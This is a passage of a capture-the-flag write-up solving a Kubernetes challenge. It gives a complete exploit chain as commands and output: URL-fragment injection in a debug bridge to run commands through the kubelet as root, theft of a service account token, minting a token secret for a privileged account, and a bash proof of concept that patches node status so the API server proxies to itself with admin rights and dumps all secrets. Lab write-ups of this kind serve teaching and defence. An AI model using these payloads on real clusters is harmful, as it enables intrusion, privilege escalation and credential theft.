* Connected to app-blog-service.app (10.43.1.36) port 80
* using HTTP/1.x
> POST /register HTTP/1.1
> Host: app-blog-service.app
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Length: 51
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 51 bytes
< HTTP/1.1 303 See Other
< Location: /login?ok=1
< X-Content-Type-Options: nosniff
< Date: Fri, 28 Nov 2025 12:57:43 GMT
< Content-Length: 0
<
* Connection #0 to host app-blog-service.app left intact
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app/login -d 'username=skybound&password=testing' -v
* Host app-blog-service.app:80 was resolved.
* IPv6: (none)
* IPv4: 10.43.1.36
* Trying 10.43.1.36:80...
* Connected to app-blog-service.app (10.43.1.36) port 80
* using HTTP/1.x
> POST /login HTTP/1.1
> Host: app-blog-service.app
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Length: 34
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 34 bytes
< HTTP/1.1 303 See Other
< Location: /
< Set-Cookie: hustlehub_session=MTc2NDMzNDY5OXxlc2dMYW8wdUNpUmtJYVJLcWtuZzdzd1ctWXNMYUY5c2psd2FBMUJvTHpxd3FwMXNKSHN6TjhubEJoVXhHZ1JiRjg1TWdnOEhwY2lNenRKNXRicXYwR3lJdkJncmNrbmpERUpybzZ4MHBZTi1aS21DfJQMbtRM3Edd9ytTYWfLH-fFyxJ9y2R3siQaAqw2jy7l; Path=/; Max-Age=86400; HttpOnly; Secure; SameSite=Lax
< X-Content-Type-Options: nosniff
< Date: Fri, 28 Nov 2025 12:58:19 GMT
< Content-Length: 0
<
* Connection #0 to host app-blog-service.app left intact
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl -H 'Cookie: hustlehub_session=MTc2NDMzNDY5OXxlc2dMYW8wdUNpUmtJYVJLcWtuZzdzd1ctWXNMYUY5c2psd2FBMUJvTHpxd3FwMXNKSHN6TjhubEJoVXhHZ1JiRjg1TWdnOEhwY2lNenRKNXRicXYwR3lJdkJncmNrbmpERUpybzZ4MHBZTi1aS21DfJQMbtRM3Edd9ytTYWfLH-fFyxJ9y2R3siQaAqw2jy7l' app-blog-service.app/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HustleHub - 10x Your Net Worth</title>
<link rel="stylesheet" href="/static/styles.css">
</head>
<body>
<div class="container">
<div class="card">
<h1>HustleHub Dashboard</h1>
<p class="tagline">Welcome back, skybound. Time to 10x your empire.</p>
<div class="hero">
<h2>You're In.</h2>
<p>While others sleep, you grind. While they doubt, you scale. You didn't come here to be average.</p>
</div>
<div class="stats">
<div class="stat-card">
<div class="stat-number">10</div>
<div class="stat-label">LLCs Recommended</div>
</div>
<div class="stat-card">
<div class="stat-number">$80K</div>
<div class="stat-label">Monthly Passive (Projected)</div>
</div>
<div class="stat-card">
<div class="stat-number">3.2x</div>
<div class="stat-label">ROI This Quarter</div>
</div>
</div>
<div class="tips">
<h3>Pro Tips from the HustleHub Network</h3>
<ul>
<li>Generate passive aggressive income streams that work for you but aren't happy about it.</li>
<li>Wake up at 4 AM and open a Delaware LLC by noon. If you're not uncomfortable, you're not growing.</li>
<li>Money not coming in? You NEED MORE HUSTLE. Sign up for our limited course '10x Your Life' for just $2,999 using code 'GrindnosaurusRex'</li>
</ul>
</div>
<div class="actions">
<a href="/logout" class="btn-secondary">Logout</a>
</div>
</div>
</div>
</body>
</html>
Welp, that looks boring; nothing immediately springs to mind there. Back to the k8s-debug-bridge. After a while, I started thinking about how they generate the target URL.
targetUrl := fmt.Sprintf("https://%s:10250/%s/%s/%s/%s", req.NodeIP, kubeletEndpoint, req.PodNamespace, req.PodName, req.ContainerName)
This basically trusts user input for the URL components; validation is only applied to the final assembled URL. So theoretically, I could put an entire URL into the node_ip parameter and "comment out" the rest. The URL I provide would still need to pass validation, which requires that it:
- Is parseable as a URL
- Points to an IP address, not a hostname
- Has an IP within the node's /24 subnet (the code comment says /16, but the appended CIDR is /24)
- Does not contain k8s-debug-bridge in the path
- Has at least 3 path parts
- Has app as the second path part (normally the namespace)
I wonder if I can get it to list pods; the kubelet endpoint for that is just /pods. If I add a # after that, the rest of the path parts should still be appended to satisfy the validation, while the kubelet ignores everything after the fragment.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/logs -d '{"node_ip": "172.30.0.2:10250/pods##", "pod": "app-blog", "namespace": "app", "container": "app-blog"}'
invalid URL path format
Wait… what… that's the path-parts check… oh, re-reading the source code, the validation runs against the parsed URL, so anything after the # is stripped before the path parts are counted. We need to supply those parts ourselves. OK, let's see if we can get code execution in that pod instead. The kubelet path for that is /run/<namespace>/<pod>/<container>, and it needs a cmd parameter. I usually send that via POST data, but I wonder if we can inject it as a URL query parameter.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/logs -d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#", "pod": "app-blog", "namespace": "app", "container": "app-blog"}'
Failed to fetch GET: kubelet returned status 405: 405: Method Not Allowed
Ah yes, the /logs endpoint sends a GET request to the kubelet, but /run requires a POST. The /checkpoint endpoint, which proxies a POST, should get us around that.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/checkpoint -d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#", "pod": "app-blog", "namespace": "app", "container": "app-blog"}'
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Success. OK, let’s steal its service account token and go from there.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/checkpoint -d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=cat+/var/run/secrets/kubernetes.io/serviceaccount/token#", "pod": "app-blog", "namespace": "app", "container": "app-blog"}'; echo
eyJhbGciOiJSUzI1NiIsImtpZCI6IjVjWHc0NnVkX0RVeHpLb05zenduT2t6WTUxOTJhTmVSSnpuWFQ5VGp5TEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzk1ODcxMTc2LCJpYXQiOjE3NjQzMzUxNzYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiZmI4NGU1NGQtYjY0NC00ZjI0LWE2MTAtZWY5NTBkZDk0M2UzIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHAiLCJub2RlIjp7Im5hbWUiOiJub2RlciIsInVpZCI6IjgwMWY3YjVkLTIzMzItNDQzYS05ZDQ0LWExOTBkMWM5MzM0ZCJ9LCJwb2QiOnsibmFtZSI6ImFwcC1ibG9nIiwidWlkIjoiYjJhMGM5NDctOWQzYi00ZTk1LTk4ZmYtZmNkMjU0NDExNjhmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJhcHAiLCJ1aWQiOiI2Y2JiNTU4Ny05OWM5LTQ0YWQtYTgzYi1lMWVlOTYwZTI5NjQifSwid2FybmFmdGVyIjoxNzY0MzM4NzgzfSwibmJmIjoxNzY0MzM1MTc2LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwOmFwcCJ9.qpZ7PU7y9DJdJm44dHav8UvrFV1IUScnur2MMapvM6LwRJmAMb7NfIMizcwDZ9fv_0V0jZMhRSjXZsNWCxxb5WwfiePCBuwhuyjCvZncGuhzi_0cwU9NrevUNm30gapkEnD2VGyo1lVjn1J5wSTx9zegKc_WDMT09R9pF7x7SehQMqIGkIoOYg59KvMS5QG5F2XqK8pJthHyCKnCLRX00Ct2ZGCnE16iaWRz4JZx9xX4ILSDmZC1Ur8GmegbZmQdcMFK0dia2ecrZ6JsntSnAK1yHzg6Hc7qt3BwOgGIHBcxS-o2qJS6aEwxSJRIwni1jzVEw5HLfFJyGgtDSBr6Hg
The command contains a + because it’s passed as a URL query parameter, where the space needs to be URL-encoded, which results in a +.
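Out of habit I like to peek inside a stolen token before using it. A throwaway helper along these lines (the function is mine, not part of the challenge) confirms the payload’s sub is system:serviceaccount:app:app:

```shell
# Decode a JWT's payload segment without verifying the signature.
jwt_payload() {  # usage: jwt_payload "$TOKEN"
  p=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  # base64url strips the padding; restore it so base64 -d is happy
  while [ $(( ${#p} % 4 )) -ne 0 ]; do p="${p}="; done
  printf '%s' "$p" | base64 -d
}
# jwt_payload "$TOKEN"   # prints the claims JSON
```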
Let’s see what this token can do.
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app auth can-i --list
Error from server (Forbidden): selfsubjectrulesreviews.authorization.k8s.io is forbidden: User "system:serviceaccount:app:app" cannot create resource "selfsubjectrulesreviews" in API group "authorization.k8s.io" at the cluster scope
Siiiggghhhhhhhhhh!
OK, let’s just brute force the common ones..
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:app:app" cannot list resource "pods" in API group "" in the namespace "app"
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get svc
Error from server (Forbidden): services is forbidden: User "system:serviceaccount:app:app" cannot list resource "services" in API group "" in the namespace "app"
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get cm
Error from server (Forbidden): configmaps is forbidden: User "system:serviceaccount:app:app" cannot list resource "configmaps" in API group "" in the namespace "app"
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get secrets
NAME TYPE DATA AGE
user-johndoe Opaque 3 32d
user-skybound Opaque 3 13m
OK. It has some level of permissions on secrets. Based on the presence of the user-skybound secret, clearly it can create secrets too…
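In hindsight, a small loop makes this kind of brute forcing less tedious. A throwaway sketch (the helper name and resource shortlist are mine):

```shell
# Probe common verbs/resources by hand when `auth can-i --list` is forbidden.
# KUBECTL is a variable so this can point at an alias or a different identity.
: "${KUBECTL:=kubectl}"
probe_perms() {  # usage: probe_perms <namespace>
  for r in pods services configmaps secrets deployments serviceaccounts roles rolebindings; do
    for v in get list create delete; do
      $KUBECTL -n "$1" auth can-i "$v" "$r" 2>/dev/null | grep -qx yes \
        && echo "can $v $r"
    done
  done
  return 0
}
# probe_perms app
```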
The fact that the k8s-debug-bridge is in the same namespace leads me to a thought: could we create a secret of type kubernetes.io/service-account-token (these get auto-populated by Kubernetes with the appropriate service account token) and point it at the service account used by k8s-debug-bridge? We would need to know the service account name, but we might be able to figure that out: we can probably trick the bridge into sending a request it is not authorised to perform, and the error response should give us the service account name. Let’s find the IP of the API server in the nodes’ CIDR range.
root@test:~/k8s-debug-bridge/blobs/sha256/root# nmap -p- 172.30.0.1-3 -T5
Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-28 13:16 UTC
Nmap scan report for 172.30.0.1
Host is up (0.0000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
37149/tcp open unknown
Nmap scan report for noder (172.30.0.2)
Host is up (0.0000060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
6443/tcp open sun-sr-https
10250/tcp open unknown
Nmap done: 3 IP addresses (2 hosts up) scanned in 3.30 seconds
I’ll assume it’s the 6443. However, checking the 37149 (within NodePort range) also reveals that it is an API server.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/checkpoint -d '{"node_ip": "172.30.0.2:6443/run/app/app-blog/app-blog?cmd=cat+/var/run/secrets/kubernetes.io/serviceaccount/token#", "pod": "app-blog", "namespace": "app", "container": "app-blog"}'; echo
Failed to fetch POST: kubelet returned status 403: {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:serviceaccount:app:k8s-debug-bridge\" cannot post path \"/run/app/app-blog/app-blog\"","reason":"Forbidden","details":{},"code":403}
That worked. Shoulda guessed the service account was just k8s-debug-bridge though… nevermind….
We can now create the secret…
apiVersion: v1
kind: Secret
metadata:
  name: debug-bridge-token
  namespace: app
  annotations:
    kubernetes.io/service-account.name: "k8s-debug-bridge"
type: kubernetes.io/service-account-token
root@test:~/k8s-debug-bridge/blobs/sha256/root# k apply -f secret.yml
secret/debug-bridge-token created
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get secret debug-bridge-token -o yaml
apiVersion: v1
data:
  ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUJkekNDQVIyZ0F3SUJBZ0lCQURBS0JnZ3Foa2pPUFFRREFqQWpNU0V3SHdZRFZRUUREQmhyTTNNdGMyVnkKZG1WeUxXTmhRREUzTmpFMU1EZzNNalV3SGhjTk1qVXhNREkyTVRrMU9EUTFXaGNOTXpVeE1ESTBNVGsxT0RRMQpXakFqTVNFd0h3WURWUVFEREJock0zTXRjMlZ5ZG1WeUxXTmhRREUzTmpFMU1EZzNNalV3V1RBVEJnY3Foa2pPClBRSUJCZ2dxaGtqT1BRTUJCd05DQUFTVXFNQk9NbFBxZ2wzOFpRcHpZQWtScUgrWEhMRXhWN0dyNDVHNCthQTQKaU1pUzRHakd0RlJFcWhtNXlnb2ZTd3dweE54d0RKdXhIcjBOQzIzMjVZNUxvMEl3UURBT0JnTlZIUThCQWY4RQpCQU1DQXFRd0R3WURWUjBUQVFIL0JBVXdBd0VCL3pBZEJnTlZIUTRFRmdRVXZuT2ZuRURGRDJoZ001ZWlhVm1wCkZnMW9kVE13Q2dZSUtvWkl6ajBFQXdJRFNBQXdSUUlnWlI5bVVzWHlmVXlLeWFMR1QwVTgrRkl1azdId05GNDkKM2RsSFV1NkVGbXNDSVFEMGpZekY3WFluWXRnd1NzQU54VWNWcDM5OXFXMjRIYTNGemcrV2ZIK2tBQT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
  namespace: YXBw
  token: ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklqVmpXSGMwTm5Wa1gwUlZlSHBMYjA1emVuZHVUMnQ2V1RVeE9USmhUbVZTU25wdVdGUTVWR3A1VEVFaWZRLmV5SnBjM01pT2lKcmRXSmxjbTVsZEdWekwzTmxjblpwWTJWaFkyTnZkVzUwSWl3aWEzVmlaWEp1WlhSbGN5NXBieTl6WlhKMmFXTmxZV05qYjNWdWRDOXVZVzFsYzNCaFkyVWlPaUpoY0hBaUxDSnJkV0psY201bGRHVnpMbWx2TDNObGNuWnBZMlZoWTJOdmRXNTBMM05sWTNKbGRDNXVZVzFsSWpvaVpHVmlkV2N0WW5KcFpHZGxMWFJ2YTJWdUlpd2lhM1ZpWlhKdVpYUmxjeTVwYnk5elpYSjJhV05sWVdOamIzVnVkQzl6WlhKMmFXTmxMV0ZqWTI5MWJuUXVibUZ0WlNJNkltczRjeTFrWldKMVp5MWljbWxrWjJVaUxDSnJkV0psY201bGRHVnpMbWx2TDNObGNuWnBZMlZoWTJOdmRXNTBMM05sY25acFkyVXRZV05qYjNWdWRDNTFhV1FpT2lJMk5XVTFNV0k1TXkxa05UVTRMVFF3TWpVdFlXVTFOQzAxWTJGa1pHTTNaV05qWWpnaUxDSnpkV0lpT2lKemVYTjBaVzA2YzJWeWRtbGpaV0ZqWTI5MWJuUTZZWEJ3T21zNGN5MWtaV0oxWnkxaWNtbGtaMlVpZlEuRk5zY0dZa3VONlZnTXRLMWpxWUtwcVljaHNubGUzUG5Zb0NHemdheVJRMFU3TlE0Y2lkLWcyb2MxU0cxYm5FSEpIa1FWMEYteXRPZE55RHJaNllLYlZIZ2JWNG03U3BUWmdyZkNielZnZnV1RzNkLW5VZTlkejRmc2VVa0ZWNFZDSWNSdkdvS3RTSmEtdHNyV0J0UFY4cTI0Nmg2SndqVG9LajVmN3pHZEZZc2ZULXhQQXJzeXROaU9qWlo0NkJQeFo4eTJ4RkR5VFpBRFBILW5WWkFvWFU3YTVTZHNQRU91WUU1el9zN3N6N0Z0WmhPa2FSdy12UTNhUll4WjAtdW02SkRLaUxQN1hZMFM1RFRfLTNsSTJwQldZWE1YM3QxWk5JYUwwSUoxbWZjX1JMQXp6RjBObFhfaHZVVFhaa1ByLVpzTVk4UnQzZmNySGUtWDdaa3BB
kind: Secret
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","kind":"Secret","metadata":{"annotations":{"kubernetes.io/service-account.name":"k8s-debug-bridge"},"name":"debug-bridge-token","namespace":"app"},"type":"kubernetes.io/service-account-token"}
    kubernetes.io/service-account.name: k8s-debug-bridge
    kubernetes.io/service-account.uid: 65e51b93-d558-4025-ae54-5caddc7eccb8
  creationTimestamp: "2025-11-28T13:19:25Z"
  name: debug-bridge-token
  namespace: app
  resourceVersion: "1584"
  uid: dba790f1-5390-4063-b155-cccfff076f00
type: kubernetes.io/service-account-token
Excellent. Let’s see what this can do now.
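The token needs extracting from the secret first; kubectl’s jsonpath output keeps that to one line (the variable name, helper, and filename below are mine):

```shell
# Pull the auto-populated token out of the secret and decode it, e.g.:
#   TOKEN2=$(kubectl -n app get secret debug-bridge-token \
#              -o jsonpath='{.data.token}' | base64 -d)
# Offline equivalent against a saved manifest:
secret_field() {  # usage: secret_field <key> <manifest.yml>
  sed -n "s/^ *$1: *//p" "$2" | head -n1 | base64 -d
}
# TOKEN2=$(secret_field token debug-bridge-secret.yml)
```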
root@test:~/k8s-debug-bridge/blobs/sha256/root# alias k2="kubectl --token $TOKEN2"
root@test:~/k8s-debug-bridge/blobs/sha256/root# k2 auth whoami
ATTRIBUTE VALUE
Username system:serviceaccount:app:k8s-debug-bridge
UID 65e51b93-d558-4025-ae54-5caddc7eccb8
Groups [system:serviceaccounts system:serviceaccounts:app system:authenticated]
root@test:~/k8s-debug-bridge/blobs/sha256/root# k2 auth can-i --list -n app
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
nodes/checkpoint [] [] [get create patch]
nodes/proxy [] [] [get create patch]
nodes/status [] [] [get create patch]
nodes [] [] [get list watch]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Those permissions are super interesting. They remind me of a vulnerability I saw in one of the yearly Kubernetes audits; I’ve been meaning to add it to IceKube for a while, but haven’t got around to it. It was this issue. Essentially, with get on nodes/proxy, and either patch on nodes/status or create on nodes, you can trick the API server into authenticating against itself, thereby granting cluster admin. The report had a PoC script as well. Let’s use that and see if we can get it working.
Essentially, the attack works like this: you update the Kubelet address and port details within a node’s status to those of an API server. You then ask the API server to proxy a network request through the node, which it does via the Kubelet endpoint. As that endpoint has been modified to point at the API server, the API server connects and authenticates to itself, allowing your proxied request through with the API server’s own credentials.
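For reference, the bits of a node’s status that the attack rewrites look roughly like this (trimmed; field names are from the core/v1 Node API, values are the report’s example environment):

```shell
# Trimmed view of GET /api/v1/nodes/<node>/status. The PoC's seds swap the
# InternalIP address and the kubeletEndpoint Port for the API server's values.
node_status='{
  "status": {
    "addresses": [ { "type": "InternalIP", "address": "192.168.136.28" } ],
    "daemonEndpoints": { "kubeletEndpoint": { "Port": 10250 } }
  }
}'
printf '%s\n' "$node_status"
```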
The PoC script they include in the report was the following:
#!/bin/bash
set -euo pipefail

readonly NODE=rtt-k8s-node             # hostname of the worker node
readonly API_SERVER_PORT=6443          # web port of API server
readonly NODE_IP=192.168.136.28        # IP address of worker node
readonly API_SERVER_IP=192.168.136.27  # IP address of API server
readonly BEARER_TOKEN=77777            # bearer token to authenticate to API server - other authentication methods could be used

while true; do
  curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type: application/json' \
    "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status" >"${NODE}-orig.json"
  cat $NODE-orig.json |
    sed "s/\"Port\": 10250/\"Port\": ${API_SERVER_PORT}/g" | sed "s/\"${NODE_IP}\"/\"${API_SERVER_IP}\"/g" \
    >"${NODE}-patched.json"
  curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type:application/merge-patch+json' \
    -X PATCH -d "@${NODE}-patched.json" \
    "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status"
done
This script will keep a node patched, so it can be targeted with a proxy command such as:
curl -k -H "Authorization: Bearer $TOKEN" https://kubemaster01.test.lab:6443/api/v1/nodes/https:kubeworker02:10250/proxy/runningpods/
This script works when we can have multiple terminals running; within Wiz’s environment, that isn’t the case. So I’ll make a couple of quick tweaks. First we need some node IPs though.
root@test:~/k8s-debug-bridge/blobs/sha256/root# k2 get node -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
noder Ready control-plane,master 32d v1.31.5+k3s1 172.30.0.2 <none> K3s v1.31.5+k3s1 6.1.128 containerd://1.7.23-k3s2
OK, so single node, we have its IP.
We’ll modify the script to drop the while loop, perform a single patch, and then submit the proxy request. As this is a single-node cluster, the node IP and the API server IP are identical, so only the Kubelet port needs patching.
#!/bin/bash
set -euo pipefail

readonly NODE=noder                # hostname of the node
readonly API_SERVER_PORT=6443      # web port of API server
readonly NODE_IP=172.30.0.2        # IP address of the node
readonly API_SERVER_IP=172.30.0.2  # IP address of API server (same host)
readonly BEARER_TOKEN=$TOKEN2      # bearer token to authenticate to API server

curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type: application/json' \
  "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status" > "${NODE}-orig.json"
sed "s/\"Port\": 10250/\"Port\": ${API_SERVER_PORT}/g" "${NODE}-orig.json" > "${NODE}-patched.json"
curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type: application/merge-patch+json' \
  -X PATCH -d "@${NODE}-patched.json" \
  "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status"
curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" \
  "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/https:${NODE}:${API_SERVER_PORT}/proxy/api/v1/secrets/"
Running that, we get some fun output.
root@test:~/k8s-debug-bridge/blobs/sha256/root# bash script.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8391 0 8391 0 0 215k 0 --:--:-- --:--:-- --:--:-- 221k
[..SNIP..]
"data": {
"flag": "V0laX0NURntrOHNfaXNfb25lX2JpZ19wcm94eX0=",
"msg": "SWYgeW91IGNvbXBsZXRlZCB0aGlzLCBjaGVjayBvdXQgaHR0cHM6Ly96ZXJvZGF5LmNsb3VkIGZvciBhbm90aGVyIGNoYWxsZW5nZSE="
},
"type": "Opaque"
},
[..SNIP..]
Woo… decoding that gets our flag!
root@test:~/k8s-debug-bridge/blobs/sha256/root# base64 -d <<< V0laX0NURntrOHNfaXNfb25lX2JpZ19wcm94eX0=
WIZ_CTF{k8s_is_one_big_proxy}
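The msg field decodes to a nice parting note from the challenge authors as well:

```shell
base64 -d <<< SWYgeW91IGNvbXBsZXRlZCB0aGlzLCBjaGVjayBvdXQgaHR0cHM6Ly96ZXJvZGF5LmNsb3VkIGZvciBhbm90aGVyIGNoYWxsZW5nZSE=; echo
# If you completed this, check out https://zeroday.cloud for another challenge!
```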
That was a fun one. I was not expecting that final step; I think this is the first time I’ve used that technique outside a test environment where I was just playing with it.